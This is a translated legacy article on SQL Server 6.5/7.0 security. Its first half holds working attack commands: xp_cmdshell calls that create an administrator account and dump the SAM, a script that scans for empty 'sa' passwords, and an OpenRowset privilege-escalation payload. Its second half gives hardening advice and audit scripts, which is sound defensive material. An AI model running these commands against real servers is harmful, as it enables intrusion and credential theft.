At present there are many ways to break into an NT server, such as exploiting IIS vulnerabilities, but one that many people overlook is going in through the SQL Server database that runs alongside the NT server. It is actually a fairly common route; have a look at the news report at
Http://www.vnunet.com/news/1110938.
Herbless broke into several sites, such as legoland.co.uk, by going through their SQL Servers and ended up with control of the system. So protecting SQL Server is no small matter; here I have collected some vulnerabilities for everyone's reference, heh heh.
----------------------------------------------------------------
Let's first take a look at the network protocol libraries supported by the SQL Server service:
----------------------------------------------------------------
SQL Server Network Protocol Libraries
----------------------------------------------------------------
Protocol library   | Possible vulnerabilities                        | Encrypted?
----------------------------------------------------------------
Named Pipes        | - Communicates over the NT SMB ports (TCP 139,  | No
                   |   UDP 137 and 138). These can be blocked at the |
                   |   firewall, but if the internal network can     |
                   |   reach them freely that is still a small       |
                   |   weakness.                                     |
                   | - User name, password and data are sent         |
                   |   unencrypted; anyone can capture them with a   |
                   |   sniffer.                                      |
----------------------------------------------------------------
IP Sockets         | - Port 1433 is open by default; a scanner can   | No
                   |   find this port.                               |
                   | - Traffic can be intercepted with a sniffer.    |
----------------------------------------------------------------
Multi-Protocol     | - The client must support NT RPCs; different    | Yes
                   |   client types may cause problems.              |
                   | - Uses random TCP ports by default, but the     |
                   |   firewall port mapping can be fixed (see KB    |
                   |   Q164667).                                     |
                   | - Check whether the encryption option is        |
                   |   selected; it is not selected by default.      |
----------------------------------------------------------------
NWLink             | - Risk of data being captured by a sniffer.     | No
----------------------------------------------------------------
AppleTalk (ADSP)   | - Risk of data being captured by a sniffer.     | No
----------------------------------------------------------------
Banyan Vines       | - Risk of data being captured by a sniffer.     | No
----------------------------------------------------------------
The general recommendation is: if you can use Named Pipes with integrated (NT) security, or Multi-Protocol, then use those protocol libraries; if possible use Multi-Protocol and turn on its encryption option. If you cannot use either of these, use the IP Sockets protocol, change its default port, and check the system to make sure no sniffer is present. Also consider putting a web service, an administrative object layer or COM components in a middle tier and using a secure channel between the middle tier and SQL Server. There are many third-party products that encrypt this communication.
----------------------------------------------------------------
Now let's talk about SQL Server's security modes and how they work.
The security mode defines how SQL Server authenticates the users that connect to it. Below are the SQL Server 6.5 security modes, with a description of each, and the changes made in SQL Server 7.0:
----------------------------------------------------------------
Security mode     | SQL Server 6.5                              | Changes in SQL Server 7.0
----------------------------------------------------------------
Standard          | - Logins are defined in SQL Server and      | - There is no longer a separate
                  |   given a password.                         |   Standard mode.
                  | - SQL Server login accounts are separate    |
                  |   from Windows NT accounts.                 |
----------------------------------------------------------------
Integrated        | - Accounts are set up with SQL Security     | - Becomes "Windows NT Only" mode.
                  |   Manager.                                  | - Works only on NT; not supported
                  | - Users connect to SQL Server without a     |   on Win9x.
                  |   separate login name and password.         | - NT groups can be used directly,
                  | - The password is never sent over the       |   which makes administration easy
                  |   network in plain text by the application. |   (note the BUILTIN group that is
                  | - SQL Server can use NT's authentication    |   created on the local system).
                  |   facilities, such as account expiry.       |
                  | - Requires the Named Pipes or               |
                  |   Multi-Protocol library.                   |
----------------------------------------------------------------
Mixed             | - A combination of the two modes above:     | - Becomes "SQL Server and
                  |   users log in through NT, but fall back to |   Windows NT" mode.
                  |   a SQL Server login when the client cannot | - Use Windows NT Only mode
                  |   establish a trusted connection.           |   where possible.
----------------------------------------------------------------
Logging in is only the first step. Once a user has logged in, the user still has to access the individual databases, and for that there must be an entry for the user in each database's sysusers table. So pay attention to whether there is a "guest" account in your database; otherwise, before you notice, someone may already have got into your database through it.
For details, please refer to Microsoft's site:
http://www.microsoft.com/technet/sql/technote/secure.asp
----------------------------------------------------------------
Some security issues in SQL Server:
There is an 'sa' account whose password is empty by default, and this account is SQL Server's security administrator. With it we can use the xp_cmdshell extended stored procedure to run operating system commands, for example:
xp_cmdshell 'net user testuser ugothacked /add'
and then:
xp_cmdshell 'net localgroup administrators testuser /add'
In this way an attacker adds a user on the SQL Server machine. Of course, doing this remotely usually requires port 1433 to be reachable, connecting with an MS SQL client.
Of course you can also use:
xp_cmdshell 'rdisk /s'
which rebuilds the repair information in \winnt\repair without prompting the user. Once the SAM has been backed up there, an attacker can create an SMB connection to an existing share, or set one up:
xp_cmdshell 'net share getsam=c:\winnt\repair'
use the share to fetch the file, and then run L0phtCrack on it. If the SMB ports are firewalled or closed, the attacker can also copy the sam._ file into the web directory and download it with an anonymous browser. And if there is no IIS, why not use TFTP :).
OK, through a SQL Server controlled in this way, an attacker can find other machines inside the network and extend his reach. Below is a SQL script that lists the other SQL Servers on the network that have an empty 'sa' password:
----------------------------------------------------------------
-- Create temp table to store enumerated servers
set nocount on
create table #temp (shelldump varchar(255))
insert #temp exec xp_cmdshell 'osql -L'
declare @current_server varchar(255), @conn_string varchar(255)
declare sql_cursor cursor for select * from #temp
open sql_cursor
fetch next from sql_cursor into @current_server
-- Loop through potential targets and check for null sa accounts
-- If target is vulnerable, version information will be displayed
while @@fetch_status = 0
begin
    if @current_server <> 'Servers:'
    begin
        select @current_server = rtrim(ltrim(@current_server))
        select @conn_string = 'exec xp_cmdshell ''osql -S ' + @current_server + ' -U sa -P "" -Q "select @@version"'''
        print 'Attempting connection to server: ' + @current_server
        execute (@conn_string)
        print '================================================================'
    end
    fetch next from sql_cursor into @current_server
end
-- Clean up
close sql_cursor
deallocate sql_cursor
drop table #temp
----------------------------------------------------------------
Of course, some people may have disabled the xp_cmdshell extended stored procedure; then we can also use the following method:
xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'
If the MSSQLServer service is running under the local system account and syskey is not enabled on the system, this call can return the encrypted passwords and SIDs from the registry.
----------------------------------------------------------------
Another vulnerability is the privilege elevation through ad hoc heterogeneous queries; see the following Microsoft description: http://www.microsoft.com/technet/security/bulletin/fq00-014.asp
For this vulnerability, the following exploit can be used to gain elevated privileges:
select * from OpenRowset('sqloledb', 'trusted_connection=yes;data source=myserver', 'set fmtonly off execute master..xp_cmdshell "dir c:\"')
That is just one example; you can run whatever other commands come to mind.
----------------------------------------------------------------
And the most recent vulnerability: Extended Stored Procedure Parameter Parsing, with details at this URL:
Http://www.microsoft.com/technet/security/bulletin/ms00-092.asp.
The main problem lies in the ODS API function srv_paraminfo(), which extended stored procedures use to interpret the parameters of a call. For example, to list the directory tree of C:\WINNT you can write:
EXEC xp_dirtree 'C:\WINNT'
But the length of each parameter is not checked, so passing a very long string can overwrite other data on the stack, which results in a buffer overflow.
The currently known affected extended stored procedures are as follows:
1. xp_peekqueue (xpqueue.dll) and xp_printstatements (xprepl.dll)
   Passing a long string as the first parameter overwrites the return address saved by the exception handler.
2. xp_proxiedmetadata (xprepl.dll)
   This stored procedure takes four parameters. Passing a long string as the second parameter overwrites the return address saved by the exception handler.
3. xp_setsqlsecurity (xpstar.dll)
   This stored procedure takes four parameters. Passing a long string as the third parameter terminates the entire SQL Server process immediately.
4. xp_displayparamstmt (xprepl.dll), xp_enumresultset (xprepl.dll), xp_showcolv (xprepl.dll) and xp_updatecolvbm (xprepl.dll)
   Passing a long string as the first parameter causes an access violation and overwrites the return address saved by the exception handler.
Here's a trick: if you want to know which DLL file a given extended stored procedure calls, you can do this, for example:
select o.name, c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and o.name = 'xp_peekqueue'
This gives you the DLL that the extended stored procedure calls. If Microsoft had no patch you could temporarily rename this DLL file; of course, some DLL files are called by several extended stored procedures and cannot be changed blindly, otherwise the others stop working, so use the following to find out which extended stored procedures call a DLL:
select o.name, c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and c.text = 'xpqueue.dll'
Fortunately Microsoft has released a patch, which you can find below, so there is no need to go hunting for DLLs, heh:
http://support.microsoft.com/support/sql/xp_security.asp
This vulnerability was discovered by @stake, who also provide proof-of-concept test code; you can find it here:
http://www.atstake.com/research/advisories/2000/sqladv2-poc.c
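To turn the two lookup queries above into a routine check, here is an added example (not code from the original article, from Microsoft or from @stake) that lists every extended stored procedure implemented by the three DLLs named in MS00-092 and shows whether the public role has been granted EXECUTE on it. It assumes the SQL Server 7.0 system tables sysobjects, syscomments and sysprotects, and that syscomments.text holds just the DLL name, as the article's own query assumes.

```sql
-- Added example: inventory the extended stored procedures implemented by the DLLs
-- named in MS00-092 and flag those that the public role (uid 0) may execute.
-- Run in the master database on SQL Server 7.0.
use master
go
select  o.name as xp_name,
        c.text as dll_name,
        -- sysprotects: action 224 = EXECUTE,
        -- protecttype 204/205 = GRANT with / without GRANT OPTION
        case when exists (select *
                          from   sysprotects p
                          where  p.id = o.id
                            and  p.uid = 0
                            and  p.action = 224
                            and  p.protecttype in (204, 205))
             then 'yes' else 'no'
        end as public_can_execute
from    sysobjects o
join    syscomments c on c.id = o.id
where   o.xtype = 'X'                        -- extended stored procedures only
  and   c.text in ('xpqueue.dll', 'xprepl.dll', 'xpstar.dll')
order by c.text, o.name
go
```

Until the patch from the support page above has been applied, the rows marked 'yes' are the ones to deal with first, since only procedures that ordinary logins can call are reachable from a non-administrative connection; `revoke execute on xp_peekqueue from public` removes that grant without touching the DLL.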
----------------------------------------------------------------
OK, of course SQL Server also has some other, relatively mild vulnerabilities, such as the one discovered by ISS: the administrator login ID is stored in the registry, and since its encryption method is simple it is easy to recover. For details see: http://xForce.iss.net/alerts/advise45.php3. Everyone can look elsewhere for the others.
----------------------------------------------------------------
Some security recommendations for SQL Server systems:
- Make sure the latest security patches are applied, as follows:
Windows NT 4.0 - Service Pack 6a
SQL Server 6.5 - Service Pack 5a
SQL Server 7.0 - Service Pack 2 (plus various hotfixes; check http://www.microsoft.com/download)
SQL Server 2000 - HotFix S80233i.exe (Intel)
Of course, everyone must also keep a close eye on Microsoft's security bulletins.
- Do not use port 1433 for IP Sockets; if you use Multi-Protocol, change the port as well.
- Do not embed the 'sa' password in any application, such as VB/Delphi apps, or in a global.asa file, because 'sa' is SQL Server's default account: its privileges are similar to the Administrator account of the Windows NT system, and its password is empty by default.
- Change the passwords of the 'sa' and 'probe' accounts.
- Make sure SQL Server's error logs are stored on an NTFS file system.
- If you don't need xp_cmdshell, don't leave the xp_cmdshell extended stored procedure on the machine (use sp_dropextendedproc 'xp_cmdshell'). In any ISQL window enter:
use master
sp_dropextendedproc 'xp_cmdshell'
- Drop the OLE Automation stored procedures; of course, some features in Enterprise Manager will then no longer work. These procedures are:
sp_OACreate sp_OADestroy
sp_OAGetErrorInfo sp_OAGetProperty
sp_OAMethod sp_OASetProperty
sp_OAStop
- Remove the unneeded registry access procedures, as follows:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
- Remove other system stored procedures if you think they are still a threat; of course, be careful with these and test them on a test machine first to make sure your system still works normally. These procedures include:
sp_bindsession sp_cursor sp_cursorclose
sp_cursorfetch sp_cursoropen sp_cursoroption
sp_getbindtoken sp_getmbcscharlen sp_ismbcsleadbyte
sp_OACreate sp_OADestroy sp_OAGetErrorInfo
sp_OAGetProperty sp_OAMethod sp_OASetProperty
sp_OAStop sp_replcmds sp_replcounters
sp_repldone sp_replflush sp_replstatus
sp_repltrans sp_sdidebug xp_availablemedia
xp_cmdshell xp_deletemail xp_dirtree
xp_dropwebtask xp_dsninfo xp_enumdsn
xp_enumgroups xp_enumqueuedtasks
xp_eventlog xp_findnextmsg xp_fixeddrives
xp_getfiledetails xp_getnetname xp_grantlogin
xp_logevent xp_loginconfig xp_logininfo
xp_makewebtask xp_msver xp_perfend
xp_perfmonitor xp_perfsample xp_perfstart
xp_readerrorlog xp_readmail xp_revokelogin
xp_runwebtask xp_schedulersignal xp_sendmail
xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap
xp_sprintf xp_sqlinventory xp_sqlregister
xp_sqltrace xp_sscanf xp_startmail
xp_stopmail xp_subdirs xp_unc_to_drive
- Remove the guest user from the databases.
- Turn off SQL Mail to prevent some Trojan horse viruses.
- Set up a scheduled task that runs the following program:
findstr /C:"login failed" \mssql7\log\*.*
and redirects the output to a file or mails it to the administrator's mailbox.
- Check frequently for accounts with an empty password:
use master
select name, password
from syslogins
where password is null
order by name
- Check all stored procedures and extended stored procedures that do not require 'sa' permission:
use master
select sysobjects.name
from sysobjects, sysprotects
where sysprotects.uid = 0
  and xtype in ('X', 'P')
  and sysobjects.id = sysprotects.id
order by name
- Make sure SQL Server's network traffic is on an isolated network segment.
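The empty-password check, the guest-account warning from the section on security modes, the public-execute check and the sp_dropextendedproc clean-up above, combined into one script that can be scheduled alongside the findstr task. This is an added example, not code from the original article or from Microsoft; it assumes the SQL Server 7.0 system tables sysobjects, sysprotects, syslogins and sysusers (the hasdbaccess column does not exist in 6.5) and the undocumented sp_MSforeachdb procedure, and the procedures it drops are exactly the xp_cmdshell, OLE Automation and registry procedures listed above.

```sql
-- Added example: audit-and-harden script for the recommendations above.
-- Section 1 only reports; section 2 drops procedures, so, as the article
-- advises, run it on a test machine first.
use master
go

-- 1a. Logins whose password is empty ('sa' and 'probe' are empty by default)
select name, 'EMPTY PASSWORD' as finding
from   syslogins
where  password is null
order by name

-- 1b. Databases in which the guest user has been granted access
--     (sp_MSforeachdb substitutes each database name for the ? placeholder)
exec sp_MSforeachdb 'if exists (select * from [?]..sysusers
                                where name = ''guest'' and hasdbaccess = 1)
                        print ''guest has access in database: ?'''

-- 1c. Stored (P) and extended (X) procedures that public (uid 0) may execute:
--     sysprotects action 224 = EXECUTE, protecttype 204/205 = GRANT
select o.name, o.xtype, 'PUBLIC CAN EXECUTE' as finding
from   sysobjects o
join   sysprotects p on p.id = o.id
where  p.uid = 0
  and  p.action = 224
  and  p.protecttype in (204, 205)
  and  o.xtype in ('X', 'P')
order by o.name
go

-- 2. Drop the shell, OLE Automation and registry extended stored procedures
--    named in the recommendations. Only existing ones are dropped, so the
--    script can be re-run without errors.
declare @xp sysname
declare xp_cursor cursor for
    select name
    from   sysobjects
    where  xtype = 'X'
      and  name in ('xp_cmdshell',
                    'sp_OACreate', 'sp_OADestroy', 'sp_OAGetErrorInfo',
                    'sp_OAGetProperty', 'sp_OAMethod', 'sp_OASetProperty',
                    'sp_OAStop',
                    'xp_regaddmultistring', 'xp_regdeletekey',
                    'xp_regdeletevalue', 'xp_regenumvalues', 'xp_regread',
                    'xp_regremovemultistring', 'xp_regwrite')
open xp_cursor
fetch next from xp_cursor into @xp
while @@fetch_status = 0
begin
    print 'dropping extended stored procedure ' + @xp
    exec sp_dropextendedproc @xp
    fetch next from xp_cursor into @xp
end
close xp_cursor
deallocate xp_cursor
go
```

The two halves are separated so that section 1 can be run on its own from a scheduled job, with its output redirected to a file or mailed to the administrator in the same way as the findstr check; section 2 is meant to be run once, after confirming on a test machine that Enterprise Manager features you rely on do not need the OLE Automation or registry procedures.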